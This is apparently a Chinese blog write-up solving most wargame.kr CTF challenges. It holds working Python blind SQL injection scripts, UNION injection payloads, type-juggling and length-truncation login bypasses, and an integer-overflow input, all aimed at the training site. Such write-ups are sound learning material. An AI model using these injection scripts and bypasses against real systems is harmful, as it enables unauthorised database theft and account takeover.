wargame.kr 大部分writeup
网址:http://wargame.kr/challenge
already got
这个题打开直接就在响应头信息里
QR CODE PUZZLE
打开后发现有段不能看的图,查看源码发现图片被URL编码
<script type="text/javascript">
/*<![CDATA[*/$(function(){ $('#join_img').attr('src',unescape('.%2f%69%6d%67%2f%71%72%2e%70%6e%67'));$('#join_img').jqPuzzle({rows:6,cols:6,shuffle:true,numbers:false,control:false,style:{overlap:false}});hide_pz();});function hide_pz(){var pz=$('#join_img div'); if(pz[pz.length-2]){$(pz[1]).remove();$(pz[pz.length-2]).remove();}else{setTimeout("hide_pz()",5);}}
/*]]>*/
</script>
将%2f%69%6d%67%2f%71%72%2e%70%6e%67
解码后得到/img/qr.png
,访问得到二维码,随后得到网址,即得flag
flee button
打开后查看源码,得到一个链接,直接访问即得flag
login filtering
查看源码,得到关键代码
if(isset($_POST['id']) && isset($_POST['ps'])){include("../lib.php"); # include for auth_code function.mysql_connect("localhost","login_filtering","login_filtering_pz");mysql_select_db ("login_filtering");mysql_query("set names utf8");$key = auth_code("login filtering");$id = mysql_real_escape_string(trim($_POST['id']));$ps = mysql_real_escape_string(trim($_POST['ps']));$row=mysql_fetch_array(mysql_query("select * from user where id='$id' and ps=md5('$ps')"));if(isset($row['id'])){if($id=='guest' || $id=='blueh4g'){echo "your account is blocked";}else{echo "login ok"."<br />";echo "Password : ".$key;}}else{echo "wrong..";}}
并给出了两个用户
you have blocked accounts.guest / guest
blueh4g / blueh4g1234ps
由于mysql_real_escape_string的存在,会将特殊字符转义,再加上固定编码格式为UTF-8
,基本上防止绕过。如此,就只能在比较上下功夫,由于数据库没有进行大小写严格的过滤,所以利用大小写来绕过比较判断。所以提交id=Guest&ps=guest
即得flag
WTF_CODE
打开看一片空白,但有的是tab,有的是空格,猜测是whitespace语言,脚本破解
def t2i(str): out = 0 for i in range(0,8): out += int(str[i])*(2**(7-i)) return out f = open("C:/Users/lanlan/Desktop/source_code.ws","rb")
x = f.readline()
x = f.readline()
ans=""
k = 0
while x: out = '' for c in x: if c==' ': out += '0' else: out += '1' x = f.readline() l = len(out) if 8 <= l <= 11 and k%2 ==0: print out c = t2i('0'+out[l-8:l-1]) #print c#print chr(c)ans+= chr(c)k+=1
f.close()
print ans
即得flag
DB is really GOOD
首先确定数据库类型,通过write.php
尝试各种字符,知道加/
促使报错,知道是sqlite数据库
通过查找规律可以知道sqlite数据库的db
文件位置在/db/wkrm_username.db
处,直接访问下载得到db
文件
直接notepad++查看,最后发现文件路径
访问即得flag
fly me to the moon
打开是一个游戏,貌似需要分数很高,通过提示需要作弊修改,查看源码没有发现情况,直接一步一步抓包
在high-scores.php
页面修改分数,修改很大,最后得到flag
md5_compare
查看,发现是md5弱类型比较
if (isset($_GET['v1']) && isset($_GET['v2'])) {sleep(3); // anti brute force$chk = true;$v1 = $_GET['v1'];$v2 = $_GET['v2'];if (!ctype_alpha($v1)) {$chk = false;}if (!is_numeric($v2) ) {$chk = false;}if (md5($v1) != md5($v2)) {$chk = false;}if ($chk){include("../lib.php");echo "Congratulations! FLAG is : ".auth_code("md5_compare");} else {echo "Wrong...";}}
}
md5 password
是一个关于MD5加密后的sql注入,直接
链接
strcmp
<?phprequire("../lib.php"); // for auth_code function$password = sha1(md5(rand().file_get_contents("/var/lib/dummy_file")).rand());if (isset($_GET['view-source'])) {show_source(__FILE__);exit();}else if(isset($_POST['password'])){sleep(1); // do not brute force!if (strcmp($_POST['password'], $password) == 0) {echo "Congratulations! Flag is <b>" . auth_code("strcmp") ."</b>";exit();} else {echo "Wrong password..";}}?>
同样是一个弱类型比较
type confusion
tmitter
打开看是一个伪造的注册登录界面,由于提示要求admin
进入,但不知道其密码,在注册的页面得到提示
是利用最大长度截断来强行注册admin达到修改密码的目的
由于有trim()
存在会过来首尾两段空格,所以在一堆空格后面附加1
来绕过,最后通过此函数来强行注册
SimpleBoard
首先可以知道http://wargame.kr:8080/SimpleBoard/read.php?idx=5
是一个注入点,查看源码
关键部分
public function read($idx){$idx = mysql_real_escape_string($idx);if ($this->read_chk($idx) == false){$this->inc_hit($idx);}return $this->db->get_query("select * from {$this->table} where idx=$idx");
}
private function read_chk($idx){if(strpos($_COOKIE['view'], "/".$idx) !== false) {return true;} else {return false;}}
}
从这可以知道当输入idx
的时候,相应的cookie也要加上idx
部分才能正常提交
首先查看数据库
数据库名为SimpleBoard
查看表名
得到关键表名README
查看列名
列名flag
最后得到具体值
web chatting
是一个SQL注入的题,首先随便输一个ID进去查看源码,得到注入点t=1&ni=0
得到数据库
得到表
尝试chat_log_secret
得到flag
img recovery
开始用谷歌打开,发现
用火狐打开
将两个拼起来就得到二维码,扫描得到密码,登陆即可
ip log table
直接sqlmap跑吧
loney_guys
经过测试,是order by 后的注入,直接脚本
import requestsurl = 'http://wargame.kr:8080/lonely_guys/' def sendsort(pstr): data = {'sort':pstr} s=requests.post(url=url,data=data)sec=s.elapsed.secondsif sec < 3: return 1 else: return 0
TEMPLATE = 'desc,if((ascii(mid((select database() limit 1),%d,1))>%d),1,sleep(2))'
# database len=11 lonely_guys
#TEMPLATE = 'desc,if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),%d,1))>%d),1,sleep(2))'
# table_name len=7 authkey
#TEMPLATE = 'desc,if((ascii(mid((select column_name from information_schema.columns where table_name=0x617574686b6579 limit 1),%d,1))>%d),1,sleep(2))'
#len = 7 authkey
#TEMPLATE = 'desc,if((ascii(mid((select * from authkey limit 1),%d,1))>%d),1,sleep(2))'
# key len = 40 for i in range(1,50): if sendsort(TEMPLATE%(i,0)) == 0: print i,'OK' break else: print i
flag = []
for i in range(1,41): a = 31 b = 128 while abs(a-b)>1: c = int((a+b)/2) if sendsort(TEMPLATE%(i,c)) == 1: a = c else: b = c if sendsort(TEMPLATE%(i,a)) == 0: c = a else: c = b print chr(c), flag.append(chr(c)) print 'Flag:',''.join(flag)
dmbs335
首先先看源码
<?php if (isset($_GET['view-source'])) {show_source(__FILE__);exit();
}include("../lib.php");
include("./inc.php"); // Database Connectedfunction getOperator(&$operator) { switch($operator) { case 'and': case '&&': $operator = 'and'; break; case 'or': case '||': $operator = 'or'; break; default: $operator = 'or'; break;
}} if(preg_match('/session/isUD',$_SERVER['QUERY_STRING'])) {exit('not allowed');
}parse_str($_SERVER['QUERY_STRING']);
getOperator($operator);
$keyword = addslashes($keyword);
$where_clause = ''; if(!isset($search_cols)) { $search_cols = 'subject|content';
} $cols = explode('|',$search_cols); foreach($cols as $col) { $col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : ''; if($col) { $query_parts = $col . " like '%" . $keyword . "%'"; } if($query_parts) { $where_clause .= $query_parts; $where_clause .= ' '; $where_clause .= $operator; $where_clause .= ' '; $query_parts = ''; }
} if(!$where_clause) { $where_clause = "content like '%{$keyword}%'";
}
if(preg_match('/\s'.$operator.'\s$/isDU',$where_clause)) { $len = strlen($where_clause) - (strlen($operator) + 2);$where_clause = substr($where_clause, 0, $len);
} ?>
<style>td:first-child, td:last-child {text-align:center;}td {padding:3px; border:1px solid #ddd;}thead td {font-weight:bold; text-align:center;}tbody tr {cursor:pointer;}
</style>
<br />
<table border=1><thead><tr><td>Num</td><td>subject</td><td>content</td><td>writer</td></tr></thead><tbody><?php$result = mysql_query("select * from board where {$where_clause} order by idx desc");while ($row = mysql_fetch_assoc($result)) {echo "<tr>";echo "<td>{$row['idx']}</td>";echo "<td>{$row['subject']}</td>";echo "<td>{$row['content']}</td>";echo "<td>{$row['writer']}</td>";echo "</tr>";}?></tbody><tfoot><tr><td colspan=4><form method=""><select name="search_cols"><option value="subject" selected>subject</option><option value="content">content</option><option value="content|content">subject, content</option><option value="writer">writer</option></select><input type="text" name="keyword" /><input type="radio" name="operator" value="or" checked /> or <input type="radio" name="operator" value="and" /> and<input type="submit" value="SEARCH" /></form></td></tr></tfoot>
</table>
<br />
<a href="./?view-source">view-source</a><br />
通过看了一次GeekPwn2016的wp后知道具体,当然这题比GeekPwn2016的题稍简单,少了过滤,不过都差不多。
漏洞较为明显,line 30 parse_str
导致的变量覆盖,line 43 若$col
为False就不会进入赋值语句,这样$query_parts
因变量覆盖就可控,而在line 42 看到$col
是对输入做了正则匹配的返回值,这样$col
可控可以进行注入
if(!isset($search_cols)) { $search_cols = 'subject|content';
} $cols = explode('|',$search_cols); foreach($cols as $col) { $col = preg_match('/^(subject|content|writer)$/isDU',$col) ? $col : ''; if($col) { $query_parts = $col . " like '%" . $keyword . "%'"; }
这个正则只要$search_cols
不为subject|content
就行
当$col
返回为False时,$keyword
就无效
分析后开始注入
数据库
表
列
flag
jff3_magic
这个利用了PHP中的“魔术哈希”
打开后是一个弹窗,用火狐会直接返回,但是用chrome会打开一个类似博客的页面
直接F12有提示,但、下载后得到的.swp
看的
前一部分可以知道一个sql注入点no
,直接尝试构造
进行了简单的过滤,但由于他的语句就是查询用户,所以直接全真即可
输入用户名与密码,抓包
会发现密码密码错误,并且返回的一个hash值是固定不变的
尝试用网站进行解密
将所属类型进行一个查找相关的魔术数字
这样输入相应的值即可
相关学习链接
http://bobao.360.cn/learning/detail/398.html
adm1nkyj
打开源码
<?phperror_reporting(0);include("./config.php"); // hidden column nameinclude("../lib.php"); // auth_code functionmysql_connect("localhost","adm1nkyj","adm1nkyj_pz");mysql_select_db("adm1nkyj");/**********************************************************************************************************************/function rand_string(){$string = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz";return str_shuffle($string);}function reset_flag($count_column, $flag_column){$flag = rand_string();$query = mysql_fetch_array(mysql_query("SELECT $count_column, $flag_column FROM findflag_2"));if($query[$count_column] == 150){if(mysql_query("UPDATE findflag_2 SET $flag_column='{$flag}';")){mysql_query("UPDATE findflag_2 SET $count_column=0;");echo "reset flag<hr>";}return $flag;}else{mysql_query("UPDATE findflag_2 SET $count_column=($query[$count_column] + 1);");}return $query[$flag_column];}function get_pw($pw_column){$query = mysql_fetch_array(mysql_query("select $pw_column from findflag_2 limit 1"));return $query[$pw_column];}/**********************************************************************************************************************/$tmp_flag = "";$tmp_pw = "";$id = $_GET['id'];$pw = $_GET['pw'];$flags = $_GET['flag'];if(isset($id)){if(preg_match("/information|schema|user/i", $id) || substr_count($id,"(") > 1) exit("no hack");if(preg_match("/information|schema|user/i", $pw) || substr_count($pw,"(") > 1) exit("no hack");$tmp_flag = reset_flag($count_column, $flag_column);$tmp_pw = get_pw($pw_column);$query = mysql_fetch_array(mysql_query("SELECT * FROM findflag_2 WHERE $id_column='{$id}' and $pw_column='{$pw}';"));if($query[$id_column]){if(isset($pw) && isset($flags) && $pw === $tmp_pw && $flags === $tmp_flag){echo "good job!!<br />FLAG : <b>".auth_code("adm1nkyj")."</b><hr>";}else{echo "Hello ".$query[$id_column]."<hr>";}}} else {highlight_file(__FILE__);}
?>
明显id
与pw
存在注入,且没有过滤符号,所以以id
为突破口,先进行判断有多少列
总共有5列
看一下过滤语句
if(preg_match("/information|schema|user/i", $id) || substr_count($id,"(") > 1) exit("no hack");
if(preg_match("/information|schema|user/i", $pw) || substr_count($pw,"(") > 1) exit("no hack");
$tmp_flag = reset_flag($count_column, $flag_column);
发现他过滤了关键字information|schema|user和(
这样先尝试利用编码绕过(
成功
第二列为显示位,由于很多就过滤了,所以不能采取常规方法
利用sql的轮询查询好啦,将每一列的值都放置显示位进行显示
注:取名需一致,且from
后面必须为表,所以需要取名
得到id
得到pw
得到flag
得到最终flag
注:由于#
在语句中是注释,所以需要编码
QnA
抓包,发现下面有post的值,尝试注入点
发现会延时,所以type为注入点,直接盲注
脚本
import urllib, urllib2, time
import string headers = {'Host': 'wargame.kr:8080'}
url = "http://wargame.kr:8080/qna/?page=to_jsmaster"
dic="qwertyuiopasdfghjklzxcvbnm0123456789"
flag=''
for i in range(1,50):for j in dic:data = "cont=input+contents%21&mail=1&type="#data = data + "if((select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={},sleep(5),1)".format(0,j)#data = data + "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1),{},1))={}),sleep(5),1)".format(i,ord(j))#data = data + "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x617574686b6579 limit 1),{},1))={}),sleep(5),1)".format(i,ord(j))#data = data + "if(length(select authkey from authkey limit 1)={},sleep(4),1)".format(i)data = data + "if((ascii(mid((select authkey from authkey limit 1),{},1))={}),sleep(3),1)".format(i,ord(j))#print datareq = urllib2.Request(url, data, headers)response = urllib2.urlopen(req)start_time = time.time()response = urllib2.urlopen(req).read()times = time.time() - start_timeif times > 2:flag += jprint flag#print ibreak
#7
#authkey
#authkey
这题最坑的就是每次我网速不好的时候就爆破失败,郁闷,倒霉的网速
zairo
打开有源码
<?phperror_reporting(0);include("./config.php"); // hidden column nameinclude("../lib.php"); // auth_code functionmysql_connect("localhost","zairo","zairo_pz");mysql_select_db("zairo");/**********************************************************************************************************************/function rand_string(){$string = "1234567890abcdefghijklmnopqrstuvwxyz";return str_shuffle($string);}function reset_flag($count_column, $flag_column){global $count;$flag = rand_string();$query = mysql_fetch_array(mysql_query("SELECT $count_column, $flag_column FROM findflag_2"));$count = $query[$count_column];if($query[$count_column] == 150){if(mysql_query("UPDATE findflag_2 SET $flag_column='{$flag}';")){mysql_query("UPDATE findflag_2 SET $count_column=0;");echo "reset flag<hr>";}return $flag;}else{mysql_query("UPDATE findflag_2 SET $count_column=($query[$count_column] + 1);");}return $query[$flag_column];}function get_pw($pw_column){$query = mysql_fetch_array(mysql_query("select $pw_column from findflag_2 limit 1"));return $query[$pw_column];}/**********************************************************************************************************************/$tmp_flag = "";$tmp_pw = "";$id = $_GET['id'];$pw = $_GET['pw'];$flags = $_GET['flag'];$count = 0;if(isset($id)){if(preg_match("/information|schema|user|where|=/i", $id) || substr_count($id,"(") > 0) exit("no hack");if(preg_match("/information|schema|user|where|=/i", $pw) || substr_count($pw,"(") > 0) exit("no hack");$tmp_flag = reset_flag($count_column, $flag_column);$tmp_pw = get_pw($pw_column);$query = mysql_fetch_array(mysql_query("SELECT * FROM findflag_2 WHERE $id_column='{$id}' and $pw_column='{$pw}';"));echo "<hr />NOW COUNT = {$count}<br />";if($query[$id_column]){if(isset($pw) && isset($flags) && $pw === $tmp_pw && $flags === $tmp_flag){echo "good job!!<br />FLAG : <b>".auth_code("zairo")."</b><hr>";}else{echo "Hello ".$query[$id_column]."<hr>";}}}else {highlight_file(__FILE__);}
?>
先看多少列
发现有5列,这次我利用我的二次查询发现有问题,只能谷歌看其他的姿势
找到了
最后查看别人的wp脚本
#!/usr/bin/env python
# -*- coding: utf8 -*-import re, sys, time, urllib, urllib2headers = {'Host': 'wargame.kr:8080'}
s = "0123456789abcdefghijklmnopqrstuvwxyz"
chars = list(s)[::-1]
ans = ""while True and len(chars):lo = 0hi = len(chars)guessed = []while lo <= hi:time.sleep(0.01)mid = (lo + hi) // 2char = chars[mid]if char in guessed:ans += charchars.remove(char)breakcharless = list(chars)charless.remove(char)guess = "{0}{1}{2}".format(ans, char, ''.join(charless))guessed.append(char)id = urllib.quote("'UNION SELECT * FROM findflag_2/*")pw = urllib.quote("*/UNION SELECT 1,2,3,\"{}\",5 ORDER BY 4 ASC#".format(guess))data = "?id={0}&pw={1}&flag=".format(id, pw)req = urllib2.Request("http://wargame.kr:8080/zairo/" + data, '', headers)response = urllib2.urlopen(req)res = response.read()count = re.findall(r"NOW COUNT = (\d+)", res)[0]if "reset" in res:sys.exit("[!] FAILED: FLAG RESET")if "zairowkdlfhdkel" in res:lo = midelse:hi = midprint "{0}\t{1}\t{2}\t{3}\t{4}".format(guess, hi, lo, mid, count)pass
req = urllib2.Request("http://wargame.kr:8080/zairo/?id=zairowkdlfhdkel&pw=wkdlfhpw!!@%%%23@@%23&flag={0}".format(guess), '', headers)
response = urllib2.urlopen(req).read()
flag = re.findall(r"FLAG : <b>([0-9a-f]+)</b>", response)
print "[*] OUR GUESS: {0}".format(guess)
print "[!] SUCCESS! FLAG: {0}".format(flag[0])
得到flag
login with crypto! but..
查看源码
<?phpif (isset($_GET['view-source'])) {show_source(__FILE__);exit();
}include("../lib.php"); // include for auth_code function.
/*******************************************************
- DB SCHEMA (initilizing)create table accounts(idx int auto_increment primary key,user_id varchar(32) not null unique,user_ps varchar(64) not null,encrypt_ss text not null
);********************************************************/function db_conn(){mysql_connect("localhost","login_with_cryp","login_with_crypto_but_pz");mysql_select_db("login_with_crypto_but");
}function init(){db_conn();$password = crypt(rand().sha1(file_get_contents("/var/lib/dummy_file").rand())).rand();mysql_query("insert into accounts values (null,'admin','{$password}','".sucker_enc('881114')."')"); // admin`s password is secret! xDmysql_query("insert into accounts values (null,'guest','guest','".sucker_enc('000000')."')");
}
//init(); // create user for initializingfunction enc($str){$s_key = "L0V3LySH:";$s_vector_iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_3DES, MCRYPT_MODE_ECB), MCRYPT_RAND);$en_str = mcrypt_encrypt(MCRYPT_3DES, $s_key, $str, MCRYPT_MODE_ECB, $s_vector_iv);$en_base64 = base64_encode($en_str);$en_hex = bin2hex($en_str);return $en_hex;
}function sucker_enc($str){for($i=0;$i<8;$i++) $str = enc($str);return $str;
}function get_password($user,$ssn){db_conn();$user = mysql_real_escape_string($user);$ssn = mysql_real_escape_string($ssn);$result = mysql_query("select user_ps from accounts where user_id='{$user}' and encrypt_ss='".sucker_enc($ssn)."'");$row = mysql_fetch_array($result);if ($row === false) {die("there is not valid account!");}return $row[0];
}ini_set("display_errors", true);if( (isset($_POST['user']) && isset($_POST['ssn']) && isset($_POST['pass'])) ){sleep(2); // do not bruteforce !!!! this challenge is not for bruteforce!!if($_POST['pass'] == get_password($_POST['user'],$_POST['ssn'])){if($_POST['user'] == "admin"){echo "Login Success!!! PASSWORD IS : <b>".auth_code("login with crypto! but..")."</b>";}else{echo "Login Success. but you r not 'admin'..";}}else{echo "Login Failed";}}?>
<hr />
<form method="post" action="./index.php">
<table><tr><td>Identify</td><td><input type='text' value='guest' maxlength='32' name='user' /></td><tr><td>Social Security</td><td><input type='text' maxlength='6' value='000000' name='ssn' /></td><tr><td>PASSWORD</td><td><input type='text' value='guest' name='pass' /></td><tr><td colspan="2"><input type="submit" value="Login" /></td></tr>
</table>
</form>
<hr />
<a href='./?view-source'>GET SOURCE</a>
发现需要输入user
,ssn
,pass
,但是pass
是利用ssn
和user
进行3DES
的ECB
加密,并且加密8次,然后base64
加密,16进制编码,这样看,明显不是让你解密,这么复杂的加密方式一般无法解密,只能从其他方式寻找
然后发现了代码中一个点
if ($row === false) {die("there is not valid account!");}
他这个居然有个错误比较,看来需要让row
返回false
百度一番,发现mysql_query
当接收超长数据的时候会报错,返回false,因此mysql_fetch_array
会返回 NULL,绕过强类型比较
脚本
#!/usr/bin/env python
# -*- coding: utf8 -*-import requestsdata = {"user":'admin',"pass":'',"ssn":'1'*100000}
req = requests.post("http://wargame.kr:8080/login_with_crypto_but/index.php", data)
print req.text
php?c?
源码
<?phpif (isset($_GET['view-source'])) {show_source(__FILE__);exit();}require("../lib.php"); // include for auth_code function.if(isset($_POST['d1']) && isset($_POST['d2'])){$input1=(int)$_POST['d1'];$input2=(int)$_POST['d2'];if(!is_file("/tmp/p7")){exec("gcc -o /tmp/p7 ./p7.c");}$result=exec("/tmp/p7 ".$input1);if($result!=1 && $result==$input2){echo auth_code("php? c?");}else{echo "try again!";}}else{echo ":p";}
?>
<style>table {background-color:#000; color:#fff;}td {background-color:#444;}
</style>
<hr /><center><form method='post'><table><tr><td>D1:</td><td><input type='text' id="firstf" style="width:75px;" maxlength="9" name='d1'></td></tr><tr><td>D2:</td><td><input type='text' style="width:75px;" name='d2'></td></tr><tr><td colspan="2" style="text-align:center;"><input type='submit' value='try'></td></tr></table></form><div><a href='?view-source'>get source</a></div></center><script>document.getElementById("firstf").focus();</script>
打开里面的文件
#include <stdio.h>
#include <stdlib.h>
void nono();
int main(int argc,char **argv){int i;if(argc!=2){nono();}i=atoi(argv[1]);if(i<0){nono();}i=i+5;if(i>4){nono();}if(i<5){printf("%d",i);}return 0;
}
void nono(){printf("%d",1);exit(1);
}
这道题是int的溢出
32位int整数,最大值为
2^31-1=2147483647
加5就溢出,产生负数了。
本地测试一下
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
using namespace std;int main(int argc,char **argv)
{int i;i=2147483646;i=i+5;if(i<5){printf("%d",i);}return 0;
}
返回
-2147483645
故输入D1=2147483646&D2=-2147483645
得到结果
注:D1有长度限制,需要先去除
wargame.kr 大部分writeup相关推荐
- wargame.kr WriteUp
前面耽搁了一周半,一周半没碰电脑,真是爆炸,回来做做题练练手.做了几道wargame.kr的题,做了几道就不想做了,感觉还是偏基础了,意义不很大,但是博客还是要发的啊.. 这里就只有前面估计十来道的w ...
- [wargame.kr 韩国 CTF] Writeup
[wargame.kr 韩国 CTF] 1. 2. 3. 4. 1. 2. 3. 4. 135point / bughela I have accounts. but, it's blocked. c ...
- PWN passcode [pwnable.kr]CTF writeup题解系列5
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.k ...
- PWN random [pwnable.kr]CTF writeup题解系列6
目录 0x01 题目 0x02 解题思路 0x03 题解 0x01 题目 0x02 解题思路 题目比较简单,直接贴出过程 root@mypwn:/ctf/work/pwnable.kr# ssh ra ...
- PWN input [pwnable.kr]CTF writeup题解系列7
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 先连接到服务器看下情况 root@mypwn:/ctf/work/pwnable.kr# ssh input2@pw ...
- PWN horcruxes [pwnable.kr]CTF writeup题解系列15
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 ...
- PWN lotto [pwnable.kr]CTF writeup题解系列10
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 下载文件,检查一下情况 root@mypwn:/ctf/work/pwnable.kr# ssh lotto@pwn ...
- PWN uaf [pwnable.kr]CTF writeup题解系列13
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@myp ...
- Natas Wargame Level 13 Writeup(文件上传漏洞,篡改file signature,Exif)
sourcecode核心代码: 1 <? 2 3 function genRandomString() { 4 $length = 10; 5 $characters = "01234 ...
最新文章
- Chemistry.AI | 基于图卷积神经网络(GCN)预测分子性质
- CSS中的趣事之float浮动
- c++ 模板类实现堆栈实验报告_编译原理——小型类C编译器的设计和实现(生成8086汇编代码)之1:问题定义以及总体功能...
- php 字符串 中文,php 中文字符串截取乱码
- 【渝粤题库】陕西师范大学164108 网络营销与策划 作业 (高起专)
- Java 如何查询硬盘所有文件
- 效率提升工具--高级剪贴板Ditto Ditto - Windows剪贴板增强小工具,方便复制粘贴多条记录
- ExtAspNet应用技巧(十) - Grid导出为Excel文件(续)
- android 打开文件管理器选择文件
- 解析人工智能与高等教育中的大数据
- 正弦交流电有效值系数sqrt(2)的推导
- 不要再重复造轮子了,Hutool 这款开源工具类库贼好使
- (初学者)关于C语言中退格键(\b)的初步了解
- rsyslog收集华为路由器日志通过ELK处理展示
- gil 简述_求职面试常见问题:Python常见面试题全解析附答案
- 图像加噪与滤波【C#】
- 《Unity开发实战》——1.3节设置首选项
- 汇编DOSBox安装及其常见指令(附安装包)
- 零基础小白必备PS抠图技巧
- 如何解决抽样调查过程中所面临的难点和问题?——以政治学研究为例